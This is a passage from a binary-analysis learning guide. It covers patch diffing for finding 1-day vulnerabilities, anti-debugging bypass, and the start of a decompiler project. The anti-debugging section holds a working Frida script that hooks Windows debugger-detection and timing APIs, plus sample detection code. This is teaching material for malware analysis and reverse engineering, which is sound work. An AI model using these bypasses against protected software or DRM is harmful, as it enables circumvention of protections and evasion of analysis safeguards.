$ ghidriff libpng-1.6.39.so libpng-1.6.40.so -o diff_report

# Output:
# Modified Functions:
#   png_read_IDAT_data (similarity: 0.87)
#     - Added bounds check at 0x1234
#     - New comparison: if (length > max_size)
#
#   png_handle_chunk (similarity: 0.95)
#     - Additional validation in switch statement
#
# New Functions:
#   png_check_chunk_length
#
# Deleted Functions:
#   (none)

# Analysis:
# The patch adds a bounds check in png_read_IDAT_data
# This fixes CVE-2023-XXXX (buffer overflow)
# Vulnerable code: memcpy without size check
# Fixed code: size validated before copy

Implementation Hints:

Binary diffing workflow:

  1. Get old and new versions of binary
  2. Export to BinDiff/Diaphora format
  3. Run the diffing tool
  4. Focus on:
    • Modified functions with low similarity
    • New validation/bounds check functions
    • Changes near memory operations

Tools:

  • BinDiff: Best for IDA Pro users
  • Diaphora: Open source, works with IDA
  • Ghidriff: Works with Ghidra, command-line
  • Ghidra Version Tracking: Built-in

Identifying security patches:

  • Look for new if statements (validation)
  • Look for changes to buffer operations
  • Look for new error handling
  • Check functions near strings like "overflow", "bounds"

Learning milestones:

  1. Diff two versions → Generate comparison report
  2. Identify changed functions → Focus on modifications
  3. Find security patches → Understand what was fixed
  4. Recreate vulnerability → Test on old version

The Core Question You're Answering

"How do you identify what changed between two versions of a binary when you only have compiled code, and why is this the first step in finding 1-day vulnerabilities?"

This project explores patch analysis: when a vendor releases a security update, the binary changes but source code is rarely available. You must reverse-engineer both versions, identify differences, understand what was fixed, and potentially discover the vulnerability before attackers do.

Concepts You Must Understand First

  1. Control Flow Graph (CFG) Isomorphism
    • A CFG represents a function's execution paths as a directed graph where nodes are basic blocks and edges are jumps/branches
    • Graph isomorphism algorithms determine if two CFGs are structurally identical even if addresses differ

    Guiding Questions:

    • How does compiler optimization affect CFG structure without changing functionality?
    • Why can't you simply compare binaries byte-by-byte?
    • What makes two functions "similar" when their assembly differs but behavior is identical?

    Book References:

    • "Practical Binary Analysis" by Dennis Andriesse - Ch 6: Disassembly and Binary Analysis
    • "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron - Ch 3.6: Control Flow
  2. Basic Block Hashing and Function Fingerprinting
    • Basic blocks are instruction sequences with single entry/exit points
    • Hashing creates unique fingerprints based on instruction semantics

    Guiding Questions:

    • How do you create a hash resilient to address changes but sensitive to instruction changes?
    • What happens to basic block boundaries when a single instruction is added?

    Book References:

    • "Practical Binary Analysis" by Dennis Andriesse - Ch 5: Binary Analysis Fundamentals
  3. Structural vs. Semantic Diffing
    • Structural diffing compares code organization (CFG structure, basic block count)
    • Semantic diffing analyzes what code actually does

    Guiding Questions:

    • How can functions be structurally different but semantically identical?
    • What security patches show up in structural diff but not semantic diff?

    Book References:

    • "Practical Binary Analysis" by Dennis Andriesse - Ch 6: Advanced Binary Analysis
  4. Call Graph Analysis
    • Call graphs map relationships between functions
    • Changes in call patterns often indicate security-relevant modifications

    Guiding Questions:

    • How does a new security check manifest in the call graph?
    • Why are changes to error-handling call paths interesting for security?

    Book References:

    • "Practical Binary Analysis" by Dennis Andriesse - Ch 7: Advanced Static Analysis
  5. Patch Analysis Workflow
    • Systematic process: acquire binaries → analyze → diff → triage → focus on security changes

    Guiding Questions:

    • What function changes most likely indicate security fixes?
    • How do you differentiate critical security patches from benign bug fixes?

    Book References:

    • "Hacking: The Art of Exploitation" by Jon Erickson - Ch 0x300: Exploitation
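
The basic block hashing idea from concept 2 can be sketched as below. It is one possible normalization, chosen for brevity: every hex literal is replaced by a placeholder so that relocated addresses hash identically. The instruction strings are hypothetical disassembler output.

```python
import hashlib
import re

def normalize(insn: str) -> str:
    """Replace hex literals (addresses, offsets, immediates) with a placeholder."""
    return re.sub(r"0x[0-9a-fA-F]+", "IMM", insn.strip().lower())

def block_hash(instructions) -> str:
    """Fingerprint a basic block from its normalized instruction text."""
    text = "\n".join(normalize(i) for i in instructions)
    return hashlib.sha256(text.encode()).hexdigest()[:16]

# Hypothetical block from the old build, the same block after relocation,
# and a patched block with an added comparison.
old_block = ["mov eax, [rbp-0x14]", "call 0x401130", "jmp 0x401200"]
moved_block = ["mov eax, [rbp-0x14]", "call 0x401150", "jmp 0x401260"]
patched_block = ["mov eax, [rbp-0x14]", "cmp eax, 0x40", "call 0x401150", "jmp 0x401260"]

print(block_hash(old_block) == block_hash(moved_block))    # relocation is ignored
print(block_hash(old_block) == block_hash(patched_block))  # new instruction is detected
```

The trade-off is that masking every immediate also hides a patch that only changes a constant, such as a buffer size, so a practical differ would likely keep small immediates and mask only addresses.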

Questions to Guide Your Design

  1. What matching algorithm first? Simple heuristics (function size, strings) or CFG isomorphism?

  2. How will you handle false positives? What secondary checks confirm matches?

  3. Strategy for unmatched functions? How do you analyze functions in only one version?

  4. How do you visualize results? Command-line, side-by-side disassembly, HTML reports?

  5. What metadata to extract? Beyond CFGs, what information helps disambiguate functions?

  6. Handling different compiler optimizations? How do you compare -O0 vs -O2 binaries?

  7. Triaging strategy? How do you prioritize which differences to investigate?

  8. Validating findings? How do you prove a vulnerability is exploitable?

Thinking Exercise

Manual binary diffing exercise:

Compile two versions: Version 1 with strcpy(buffer, input) and Version 2 with bounds checking. Then:

  • Disassemble both in Ghidra/IDA/radare2
  • Draw CFGs for both versions
  • Identify exact assembly differences
  • Document: V1 has single basic block, V2 has diamond pattern with conditional
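
To record the result of this exercise, a small structural fingerprint per function is often enough. The sketch below counts basic blocks, edges, and calls, similar in spirit to the compact signatures used by graph-based differs; the two CFGs are hand-written guesses at what the exercise produces, not real disassembler output.

```python
def cfg_signature(cfg, calls):
    """(basic blocks, edges, call count): a cheap structural fingerprint."""
    blocks = len(cfg)
    edges = sum(len(succs) for succs in cfg.values())
    return blocks, edges, calls

# Hypothetical CFGs for the exercise: block name -> successor list.
v1 = {"entry": []}  # strcpy call and return in a single block
v2 = {
    "entry": ["copy", "reject"],  # length comparison and conditional jump
    "copy": ["exit"],
    "reject": ["exit"],
    "exit": [],
}

print("V1:", cfg_signature(v1, calls=1))
print("V2:", cfg_signature(v2, calls=2))
```

A jump from one block to a four-block diamond with an extra call is the kind of structural change that stands out even before reading the assembly.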

The Interview Questions They'll Ask

  1. "Explain BinDiff vs Diaphora vs Ghidriff." - BinDiff: graph-based differ with IDA integration (it also imports from other disassemblers through BinExport). Diaphora: open-source differ that runs as an IDA plugin. Ghidriff: command-line differ built on Ghidra.

  2. "How would you diff stripped binaries?" - Use structural features: prologues, CFG structure, string refs, API calls.

  3. "Function shows 85% similarity. Same function or false positive?" - Check callers/callees, strings, constants.

  4. "Describe graph isomorphism problem." - Deciding whether two graphs are identical up to a relabeling of nodes. It is in NP but not known to be in P or NP-complete (a candidate NP-intermediate problem), while subgraph isomorphism is NP-complete. Differs use heuristics for practical performance.

  5. "How do compiler optimizations affect diffing?" - Compensate with normalized sequences, semantic equivalence.

  6. "Walk through Patch Tuesday analysis." - Download → diff → filter security patterns → reverse-engineer.

  7. "Identify an added bounds check?" - New comparison + conditional jump creating diamond CFG.

  8. "Optimizing large binary diffs?" - Filter functions, use exact hashes, parallelize.

  9. "Detecting use-after-free patches?" - NULL checks after free, pointers set to NULL.

  10. "Build differ from scratch?" - Disassembly → CFG → fingerprinting → matching → reporting.

Books That Will Help

Topic | Book | Chapters
Binary Analysis | "Practical Binary Analysis" by Dennis Andriesse | Ch 5-7
Control Flow | "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron | Ch 3.6-3.7
Assembly | "Low-Level Programming" by Igor Zhirkov | Ch 4-5
Vulnerabilities | "Hacking: The Art of Exploitation" by Jon Erickson | Ch 0x300
Static Analysis | "Practical Malware Analysis" by Sikorski & Honig | Ch 5-6

Project 14: Anti-Debugging Bypass

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly, C, Python
  • Alternative Programming Languages: Frida scripts
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The "Resume Gold"
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Anti-Analysis / Evasion
  • Software or Tool: x64dbg, GDB, Frida
  • Main Book: "The Art of Mac Malware" by Patrick Wardle

What you'll build: Techniques to detect and bypass anti-debugging, anti-VM, and anti-analysis protections.

Why it teaches binary analysis: Real-world malware and protected software use these tricks. Knowing how to bypass them is essential.

Core challenges you'll face:

  • Detecting debuggers → maps to IsDebuggerPresent, ptrace, etc.
  • Timing checks → maps to RDTSC, GetTickCount
  • VM detection → maps to CPUID, registry checks
  • Anti-disassembly → maps to opaque predicates, junk bytes

Resources for key challenges:

Key Concepts:

  • Windows Anti-Debugging: NtQueryInformationProcess, PEB flags
  • Linux Anti-Debugging: ptrace, /proc/self/status
  • Timing Attacks: RDTSC, clock differences

Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: Projects 4-7, debugger proficiency

Real world outcome:

# Frida script to bypass anti-debugging

import frida

jscode = """
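// Note: this script uses the static Module.getExportByName(module, name) form.
// Newer Frida releases may instead need Process.getModuleByName(module).getExportByName(name).
// Bypass IsDebuggerPresent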
Interceptor.replace(
    Module.getExportByName('kernel32.dll', 'IsDebuggerPresent'),
    new NativeCallback(function() {
        console.log('[*] IsDebuggerPresent called - returning false');
        return 0;
    }, 'int', [])
);

// Bypass NtQueryInformationProcess (ProcessDebugPort)
Interceptor.attach(
    Module.getExportByName('ntdll.dll', 'NtQueryInformationProcess'),
    {
        onEnter: function(args) {
            this.processInfoClass = args[1].toInt32();
            this.buffer = args[2];
        },
        onLeave: function(retval) {
            if (this.processInfoClass === 7) {  // ProcessDebugPort
                console.log('[*] ProcessDebugPort check bypassed');
                this.buffer.writePointer(ptr(0));  // value is pointer-sized (DWORD_PTR), so this is safe on 32- and 64-bit
            }
        }
    }
);

// Bypass timing checks by hooking GetTickCount
var originalGetTickCount = Module.getExportByName('kernel32.dll', 'GetTickCount');
var lastTick = 0;
Interceptor.replace(originalGetTickCount,
    new NativeCallback(function() {
        lastTick += 100;  // Always return consistent timing
        return lastTick;
    }, 'uint', [])
);

console.log('[*] Anti-debugging bypasses installed');
"""

device = frida.get_local_device()
pid = device.spawn(['./protected.exe'])
session = device.attach(pid)
script = session.create_script(jscode)
script.load()
device.resume(pid)
input('[*] Press Enter to detach and exit\n')  # keep the hooks loaded while the target runs

Implementation Hints:

Common anti-debugging techniques:

Windows:

// Technique 1: IsDebuggerPresent
if (IsDebuggerPresent()) exit(1);

// Technique 2: PEB.BeingDebugged flag (x64: the PEB pointer lives at gs:[0x60])
PPEB peb = (PPEB)__readgsqword(0x60);
if (peb->BeingDebugged) exit(1);

// Technique 3: NtQueryInformationProcess
DWORD_PTR debugPort = 0;  // ProcessDebugPort returns a pointer-sized value
NtQueryInformationProcess(GetCurrentProcess(),
    ProcessDebugPort, &debugPort, sizeof(debugPort), NULL);
if (debugPort != 0) exit(1);

// Technique 4: Timing check
DWORD start = GetTickCount();
// ... code ...
DWORD end = GetTickCount();
if (end - start > 100) exit(1);  // Too slow = debugger

Linux:

// Technique 1: ptrace self-attach
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1) exit(1);

// Technique 2: Check /proc/self/status
FILE *f = fopen("/proc/self/status", "r");
// Look for TracerPid: non-zero = debugged
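
The /proc/self/status check above is left as a comment in the C snippet. As a minimal sketch of the same logic in Python (Linux only; the function names are illustrative), the parser is kept separate from the file read so it can be exercised with sample text:

```python
def tracer_pid(status_text: str) -> int:
    """Return the TracerPid value from /proc/<pid>/status text, or 0 if absent."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1])
    return 0

def being_traced(path: str = "/proc/self/status") -> bool:
    """True when another process (debugger, strace, ...) is tracing this one."""
    with open(path) as fh:
        return tracer_pid(fh.read()) != 0

# Sample status excerpts: untraced, then traced by PID 4242.
print(tracer_pid("Name:\tdemo\nTracerPid:\t0\nUid:\t1000\n"))
print(tracer_pid("Name:\tdemo\nTracerPid:\t4242\nUid:\t1000\n"))
```

Knowing the exact string the check looks for also tells you what to hook or fake when bypassing it.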

Bypass approaches:

  1. Patch the check: NOP out the comparison
  2. Hook the API: Return false from IsDebuggerPresent
  3. Modify environment: Clear PEB flag
  4. Use stealth debugger: ScyllaHide, TitanHide

Learning milestones:

  1. Identify techniques → Recognize anti-debugging code
  2. Static bypass → Patch checks in binary
  3. Dynamic bypass → Use hooks/plugins
  4. Write bypasses → Create reusable scripts

The Core Question You're Answering

"How do software protections detect analysis tools, and what techniques allow you to bypass these defenses without triggering detection?"

This project explores the cat-and-mouse game between analysts and software protection mechanisms. Malware, DRM systems, and commercial protections use anti-debugging, anti-VM, and anti-analysis techniques to prevent reverse engineering. Learning to bypass these protections is essential for malware analysis, vulnerability research, and understanding defensive evasion.

Concepts You Must Understand First

  1. Debugger Detection Mechanisms
    • Debuggers modify process state in detectable ways: PEB flags, debug registers, timing differences
    • Windows: IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess
    • Linux: ptrace syscall, /proc/self/status, parent PID checks

    Guiding Questions:

    • How does a debugger modify the Process Environment Block (PEB)?
    • Why can only one debugger attach to a process at a time using ptrace?
    • What happens to CPU timing when single-stepping through code?

    Book References:

    • "Practical Malware Analysis" by Sikorski & Honig - Ch 15-16: Anti-Disassembly and Anti-Debugging
    • "Hacking: The Art of Exploitation" by Jon Erickson - Ch 0x400: Debugging techniques
  2. Timing-Based Detection
    • RDTSC instruction reads CPU timestamp counter for precise timing measurements
    • Debuggers and analysis tools significantly slow execution
    • Detecting time deltas between instructions reveals analysis environments

    Guiding Questions:

    • How much slower is single-stepping compared to normal execution?
    • Can you reliably bypass RDTSC checks, and what are the techniques?
    • How do sandboxes and VMs affect timing measurements?

    Book References:

    • "Practical Malware Analysis" by Sikorski & Honig - Ch 16: Anti-Debugging (timing checks)
    • "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron - Ch 9: Virtual Memory (understanding timing)
  3. Virtual Machine and Sandbox Detection
    • VMs have artifacts: CPUID brand strings, MAC address patterns, specific drivers
    • Sandboxes exhibit behavioral patterns: limited execution time, restricted network
    • Detection through registry keys, WMI queries, device enumeration

    Guiding Questions:

    • What CPUID values expose that you're running in VMware or VirtualBox?
    • How do malware samples detect Cuckoo Sandbox specifically?
    • Can you make a VM completely undetectable, or is it fundamentally impossible?

    Book References:

    • "Practical Malware Analysis" by Sikorski & Honig - Ch 17: Anti-VM techniques
  4. Anti-Disassembly Techniques
    • Opaque predicates: jumps that always go one way but appear conditional
    • Junk bytes: instructions never executed but confuse disassemblers
    • Overlapping instructions: same bytes decoded multiple ways depending on entry point

    Guiding Questions:

    • How do junk bytes placed behind an opaque predicate desynchronize linear sweep, and why can recursive descent still be misled?
    • What happens when you jump into the middle of a multi-byte instruction?
    • How do you recognize anti-disassembly patterns versus legitimate optimizations?

    Book References:

    • "Practical Malware Analysis" by Sikorski & Honig - Ch 15: Anti-Disassembly
  5. Bypass Strategies
    • Patching: NOP out detection code, modify conditional jumps
    • Hooking: Intercept API calls and return fake values (Frida, DLL injection)
    • Environment modification: Clear PEB flags, hide debugger presence
    • Stealth tools: ScyllaHide, TitanHide, custom debugger modifications

    Guiding Questions:

    • What's the difference between static patching and dynamic hooking?
    • When is hooking superior to patching, and vice versa?
    • How do you hide from kernel-mode anti-debugging checks?

    Book References:

    • "The Art of Mac Malware" by Patrick Wardle - Ch on Anti-Analysis (techniques apply cross-platform)
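
The opaque predicates from concept 4 are easy to demonstrate in a high-level language. The sketch below uses the classic fact that the product of two consecutive integers is always even; in a protected binary the never-taken branch would hold junk bytes rather than a return statement. The function names are illustrative.

```python
def opaque_true(x: int) -> bool:
    """x and x + 1 are consecutive, so their product is always even."""
    return (x * (x + 1)) % 2 == 0

def protected_step(x: int) -> str:
    if opaque_true(x):
        return "real code"
    return "junk bytes would live here"  # never reached for any integer x

print({protected_step(x) for x in range(-5, 6)})
```

A disassembler that cannot prove the predicate is constant has to treat both branches as reachable, which is why the dead branch is a convenient place to hide bytes that decode into misleading instructions.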

Questions to Guide Your Design

  1. Which platform first? Focus on Windows (most anti-debug techniques) or Linux (simpler, ptrace-based)?

  2. Static or dynamic bypass? Patch the binary permanently or hook APIs at runtime?

  3. Tool selection? Build custom Frida scripts, use existing tools like ScyllaHide, or manually patch?

  4. How do you test your bypasses? Create your own protected binaries or use real-world samples?

  5. What's your detection library? Catalog all known anti-debug techniques and their signatures?

  6. Automation strategy? Can you automatically detect and bypass common techniques?

  7. Handling kernel-mode protections? Many advanced protections run in kernel mode. Do you need driver development skills?

  8. Documentation approach? How do you document bypass techniques for reuse?

Thinking Exercise

Manual anti-debug identification and bypass:

  1. Analyze this code snippet:
    if (IsDebuggerPresent()) {
        ExitProcess(1);
    }
    

    Compile it and:

    • Locate IsDebuggerPresent call in disassembly
    • Identify the conditional jump following the call
    • Method 1: NOP out the jump
    • Method 2: Hook IsDebuggerPresent to return 0
    • Method 3: Clear the BeingDebugged flag in the PEB
  2. RDTSC timing check:
    rdtsc
    mov ebx, eax
    ; ... some code ...
    rdtsc
    sub eax, ebx
    cmp eax, 0x1000  ; if too slow, debugger detected
    jb normal_execution  ; unsigned compare: the cycle delta is never negative
    
    • How would you bypass this statically (patching)?
    • How would you bypass this dynamically (hardware breakpoint on rdtsc)?
  3. Document your findings:
    • Technique: ___
    • Detection signature: ___
    • Bypass method 1: ___
    • Bypass method 2: ___
    • Pros/cons of each bypass: ___

The Interview Questions They'll Ask

  1. "Explain how IsDebuggerPresent works internally."
    • Checks BeingDebugged flag in PEB at offset 0x02. Bypass: clear the flag or hook the API.
  2. "What are PEB flags and how do they expose debuggers?"
    • PEB (Process Environment Block) contains NtGlobalFlag, BeingDebugged, hidden heap flags. Debuggers modify these.
  3. "Describe a timing-based anti-debugging technique."
    • RDTSC before/after code section. If delta is too large, debugger detected. Bypass: patch the comparison, avoid single-stepping through the timed region, or make RDTSC trap (CR4.TSD) from a driver or hypervisor and return controlled values.
  4. "How would you bypass ptrace anti-debugging on Linux?"
    • A process can have only one tracer, so PTRACE_TRACEME fails when a debugger is already attached. Bypass: preload a library (LD_PRELOAD) that hooks ptrace to return success without actually attaching.
  5. "What's the difference between ScyllaHide and manually patching?"
    • ScyllaHide dynamically hides debugger presence. Patching permanently modifies binary. ScyllaHide is reversible and works on unknown protections.
  6. "Explain opaque predicates and how they break disassemblers."
    • Conditions that always evaluate one way but appear dynamic. Junk bytes in the dead branch desynchronize linear sweep, and recursive descent can be misled too because it treats both branch targets as code.
  7. "How do commercial packers detect debuggers?"
    • Multi-layered: API checks, PEB inspection, timing, exception-based detection, VM detection. Combine multiple signals for confidence.
  8. "Describe kernel-mode anti-debugging techniques."
    • Direct kernel object inspection, debug port checking, handle enumeration. Bypass requires kernel driver or virtualization.
  9. "How would you build an anti-anti-debugging framework?"
    • Database of known techniques → automated detection → selective bypass based on technique type → testing harness.
  10. "What's the ethical consideration when bypassing DRM?"
    • Legal gray area. Legitimate uses: security research, malware analysis. Illegal uses: piracy. DMCA Section 1201 prohibits circumvention in many cases.
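
The "database of known techniques → automated detection" stage from question 9 can start as a plain signature scan. The sketch below is deliberately naive: the opcode bytes for RDTSC (0F 31) and CPUID (0F A2) are real encodings, but the signature table, its names, and the sample blob are illustrative, and two-byte patterns will produce false positives in data sections.

```python
SIGNATURES = {
    "rdtsc timing": bytes([0x0F, 0x31]),
    "cpuid probe": bytes([0x0F, 0xA2]),
    "IsDebuggerPresent import": b"IsDebuggerPresent",
    "TracerPid check": b"TracerPid",
}

def scan(blob: bytes) -> dict:
    """Return {technique name: [offsets]} for every signature found in `blob`."""
    hits = {}
    for name, needle in SIGNATURES.items():
        offsets, start = [], blob.find(needle)
        while start != -1:
            offsets.append(start)
            start = blob.find(needle, start + 1)
        if offsets:
            hits[name] = offsets
    return hits

# Hypothetical blob: push rbp ; rdtsc ; mov ebx, eax ; then an import name string.
sample = b"\x55\x0f\x31\x89\xc3" + b"\x00IsDebuggerPresent\x00"
print(scan(sample))
```

A fuller framework would run such matches over disassembled code and imports rather than raw bytes, then map each hit to a bypass such as a hook or a patch.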

Books That Will Help

Topic | Book | Chapters
Anti-Debugging Techniques | "Practical Malware Analysis" by Sikorski & Honig | Ch 15-17
Debugger Internals | "Hacking: The Art of Exploitation" by Jon Erickson | Ch 0x400
Process Internals | "Windows Internals" by Russinovich & Solomon | Part 1, Ch 3: Processes
Binary Protection | "The Art of Mac Malware" by Patrick Wardle | Anti-Analysis chapters
System Architecture | "Computer Systems: A Programmer's Perspective" by Bryant & O'Hallaron | Ch 8-9: Processes, Virtual Memory
Low-Level Details | "Low-Level Programming" by Igor Zhirkov | Ch 6: CPU and Memory

Project 15: Build a Decompiler

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python
  • Alternative Programming Languages: C++, Rust
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 4. The "Open Core" Infrastructure
  • Difficulty: Level 5: Master
  • Knowledge Area: Program Analysis / Code Generation
  • Software or Tool: Your disassembler, LLVM (optional)
  • Main Book: "Compilers: Principles, Techniques, and Tools" (Dragon Book)

What you'll build: A decompiler that converts assembly/IR back into readable C-like pseudocode.

Why it teaches binary analysis: Decompilation is the ultimate reverse engineering skill. Building one means understanding control flow, data flow, and type recovery.

Core challenges you'll face:

  • Control flow recovery → maps to if/else, loops from jumps
  • Data flow analysis → maps to variable identification
  • Type inference → maps to int vs pointer vs struct
  • Code generation → maps to producing readable output

Resources for key challenges:

Key Concepts:

  • Control Flow Graphs: "Engineering a Compiler" Ch. 8
  • SSA Form: "Engineering a Compiler" Ch. 9
  • Type Recovery: Academic papers on type inference

Difficulty: Master Time estimate: 2-3 months Prerequisites: All previous projects, compiler theory

Real world outcome:

Input (disassembly):
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x20
    mov     [rbp-0x14], edi
    mov     [rbp-0x20], rsi
    cmp     dword [rbp-0x14], 1
    jle     .fail
    mov     rax, [rbp-0x20]
    mov     rdi, [rax+8]
    call    atoi
    cmp     eax, 0x539
    jne     .fail
    lea     rdi, [success_msg]
    call    puts
    jmp     .end
.fail:
    lea     rdi, [fail_msg]
    call    puts
.end:
    xor     eax, eax
    leave
    ret

Output (decompiled):
    int main(int argc, char **argv) {
        int input;

        if (argc <= 1) {
            puts("Wrong!");
            return 0;
        }

        input = atoi(argv[1]);

        if (input != 1337) {
            puts("Wrong!");
            return 0;
        }

        puts("Correct!");
        return 0;
    }

Implementation Hints:

Decompilation phases:

  1. Disassembly: Convert bytes to instructions
  2. Control Flow Graph: Build graph of basic blocks
  3. Data Flow Analysis: Track value flow through registers
  4. Type Analysis: Infer types from usage
  5. Control Flow Structuring: Convert jumps to if/while
  6. Code Generation: Output C-like code

Control flow structuring algorithms:

  • If-then-else: Look for diamond patterns
  • While loops: Back edges in CFG
  • For loops: Canonical form with counter
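The two patterns above (diamonds for if-then-else, back edges for loops) can be sketched on a toy CFG stored as a dictionary of successor lists. This is a minimal illustration, not a full structuring algorithm: the block names and the `find_back_edges` / `find_diamonds` helpers are hypothetical, and the DFS-based back-edge test only matches the dominator-based definition on reducible graphs.

```python
from typing import Dict, List, Set, Tuple

CFG = Dict[str, List[str]]  # block name -> list of successor block names


def find_back_edges(cfg: CFG, entry: str) -> Set[Tuple[str, str]]:
    """Return edges (src, dst) whose target is still on the DFS stack."""
    back_edges: Set[Tuple[str, str]] = set()
    visited: Set[str] = set()
    on_stack: Set[str] = set()

    def dfs(node: str) -> None:
        visited.add(node)
        on_stack.add(node)
        for succ in cfg.get(node, []):
            if succ in on_stack:          # edge back to an ancestor: a loop
                back_edges.add((node, succ))
            elif succ not in visited:
                dfs(succ)
        on_stack.discard(node)

    dfs(entry)
    return back_edges


def find_diamonds(cfg: CFG) -> List[Tuple[str, str, str, str]]:
    """Return (head, arm_a, arm_b, join) for two-way branches whose arms rejoin."""
    diamonds = []
    for head, succs in cfg.items():
        if len(succs) != 2:
            continue
        a, b = succs
        a_succs, b_succs = cfg.get(a, []), cfg.get(b, [])
        if len(a_succs) == 1 and a_succs == b_succs:
            diamonds.append((head, a, b, a_succs[0]))
    return diamonds


if_else = {"A": ["B", "C"], "B": ["D"], "C": ["D"], "D": []}
while_loop = {"entry": ["header"], "header": ["body", "exit"],
              "body": ["header"], "exit": []}

print(find_diamonds(if_else))                 # [('A', 'B', 'C', 'D')]
print(find_back_edges(while_loop, "entry"))   # {('body', 'header')}
```

A real decompiler would also need the one-armed `if` (no else block) and nested regions, which is where interval or structural analysis comes in.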

Questions to consider:

  • How do you detect loop vs if-else?
  • How do you recover variable names?
  • How do you handle optimized code?
  • How do you represent structs?

Start simple:

  1. Handle single-block functions
  2. Add if-else handling
  3. Add while loop detection
  4. Add function call recovery
  5. Add type inference

Learning milestones:

  1. Build CFG from assembly → Basic blocks and edges
  2. Detect if-else → Diamond pattern recognition
  3. Detect loops → Back edge identification
  4. Generate readable code → Produce C-like output

The Core Question You’re Answering

“How do you transform low-level assembly instructions back into high-level readable code, and what makes decompilation fundamentally harder than compilation?”

This project tackles one of the most challenging problems in reverse engineering: recovering source-like code from compiled binaries. Unlike disassembly (which just translates machine code to assembly), decompilation attempts to reconstruct higher-level abstractions like if/while statements, function calls, and even variable types. This is the technology behind IDA’s Hex-Rays and Ghidra’s decompiler.

Concepts You Must Understand First

  1. Control Flow Graph (CFG) Construction
    • CFG is a directed graph where nodes are basic blocks and edges represent jumps
    • Basic block: maximal sequence of instructions with single entry and single exit
    • CFG is the foundation for all decompilation: it represents program structure

    Guiding Questions:

    • How do you identify basic block boundaries from assembly?
    • What happens to the CFG when indirect jumps (jump tables) are present?
    • How do you handle overlapping code or self-modifying code?

    Book References:

    • “Engineering a Compiler” by Cooper & Torczon - Ch 8: Introduction to Optimization
    • “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron - Ch 3: Machine-Level Representation
  2. Static Single Assignment (SSA) Form
    • SSA: each variable assigned exactly once, making data flow explicit
    • Phi functions merge values at control flow join points
    • SSA simplifies many analyses: dead code elimination, constant propagation, type inference

    Guiding Questions:

    • Why is SSA form useful for decompilation?
    • How do you convert assembly to SSA form?
    • What are phi functions and when do you need them?

    Book References:

    • “Engineering a Compiler” by Cooper & Torczon - Ch 9: Data-Flow Analysis
  3. Control Flow Structuring
    • Converting arbitrary jumps into if/else, while, for, switch statements
    • Some CFGs cannot be perfectly structured (irreducible graphs)
    • Algorithms: interval analysis, structural analysis, phoenix algorithm

    Guiding Questions:

    • How do you recognize an if-then-else pattern in a CFG (diamond shape)?
    • How do you detect loops (back edges in the CFG)?
    • What do you do with goto-spaghetti that can’t be structured?

    Book References:

    • “Compilers: Principles, Techniques, and Tools” (Dragon Book) - Ch 9: Machine-Independent Optimizations
    • Research papers on control flow structuring algorithms
  4. Type Inference and Recovery
    • Assembly has no types: everything is bits and bytes
    • Type inference uses data flow, operations, and usage patterns
    • Challenge: distinguishing int from pointer from struct

    Guiding Questions:

    • If a value is dereferenced, what does that tell you about its type?
    • How do you recover struct layouts from memory access patterns?
    • Can you perfectly recover types, or is it fundamentally ambiguous?

    Book References:

    • Research papers on type inference in binary analysis
    • “Practical Binary Analysis” by Dennis Andriesse - Ch 7: Advanced Static Analysis
  5. Data Flow Analysis
    • Tracking how data moves through the program
    • Reaching definitions, live variables, available expressions
    • Used for variable name recovery and optimization

    Guiding Questions:

    • How do you identify that two register uses refer to the same logical variable?
    • What is def-use chain analysis?
    • How does data flow analysis help with decompilation quality?

    Book References:

    • “Engineering a Compiler” by Cooper & Torczon - Ch 9: Data-Flow Analysis
  6. Code Generation
    • Converting structured control flow and typed variables into readable C-like code
    • Pretty-printing, variable naming, comment generation
    • Balancing accuracy vs readability

    Guiding Questions:

    • How do you generate readable variable names when originals are lost?
    • Should you preserve all assembly details or simplify for readability?
    • How do you handle assembly idioms (e.g., xor eax, eax for zeroing)?

    Book References:

    • “Compilers: Principles, Techniques, and Tools” (Dragon Book) - Ch 8: Code Generation
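To make the SSA concept from the list above concrete, here is a small sketch that renames a straight-line sequence of register assignments so that every destination is assigned exactly once. It is an illustration under simplifying assumptions: instructions are hypothetical `(dest, expression)` pairs, there is a single basic block, and therefore no phi functions are needed. Real SSA construction also has to place phi functions at control flow joins.

```python
import re
from collections import defaultdict


def to_ssa(instructions):
    """Rename (dest, expr) pairs so each destination gets a fresh version."""
    version = defaultdict(int)   # latest version number per name
    defined = set()              # names assigned so far in this block
    result = []
    for dest, expr in instructions:
        def rename(match):
            name = match.group(0)
            # Uses refer to the most recent definition; inputs stay unversioned.
            return f"{name}_{version[name]}" if name in defined else name

        new_expr = re.sub(r"[A-Za-z_]\w*", rename, expr)
        version[dest] += 1
        defined.add(dest)
        result.append((f"{dest}_{version[dest]}", new_expr))
    return result


code = [
    ("eax", "argc"),
    ("eax", "eax + 1"),
    ("ebx", "eax * 2"),
    ("eax", "ebx - eax"),
]

for dest, expr in to_ssa(code):
    print(f"{dest} = {expr}")
# eax_1 = argc
# eax_2 = eax_1 + 1
# ebx_1 = eax_2 * 2
# eax_3 = ebx_1 - eax_2
```

After renaming, each use points at exactly one definition, which is what makes def-use chains and constant propagation straightforward.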

Questions to Guide Your Design

  1. What IR (Intermediate Representation)? Use LLVM IR, custom IR, or work directly on assembly?

  2. How much do you simplify? Preserve every assembly detail or aggressively simplify to C-like code?

  3. Handling irreducible control flow? Use goto statements or try to restructure?

  4. Type system depth? Simple (int/pointer), or full (structs, arrays, function pointers)?

  5. Variable naming strategy? Generic (var1, var2) or heuristic-based (counter, buffer)?

  6. Testing approach? Compile simple C programs, decompile, compare with source?

  7. Performance vs accuracy? Fast but imperfect, or slow but highly accurate?

  8. Scope of support? Single functions or whole-program analysis with interprocedural optimization?

Thinking Exercise

Manual decompilation exercise:

  1. Given this assembly:
    push rbp
    mov  rbp, rsp
    sub  rsp, 16
